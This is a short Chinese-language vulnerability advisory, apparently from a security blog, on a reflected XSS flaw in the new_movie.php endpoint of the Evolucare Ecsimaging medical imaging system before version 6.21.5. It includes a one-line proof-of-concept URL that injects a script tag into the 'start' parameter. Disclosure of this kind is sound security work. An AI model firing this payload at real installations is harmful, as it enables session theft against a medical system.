Evolucare Ecsimaging new_movie.php反射性xss
漏洞描述
EVOLUCARE ECSimage是一款国外使用的医疗管理系统,研究发现其new_movie.php接口中存在反射性xss,其源码中直接echo了输入的参数,攻击者可以通过此行为窃取系统用户中的cookie信息等。
漏洞影响
EVOLUCARE Evolucare Ecsimaging 版本< 6.21.5
漏洞详情
poc
/new_movie.php?studyUID=1&start=<script>alert(`xss`)</script>&end=2&file=1
演示截图
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。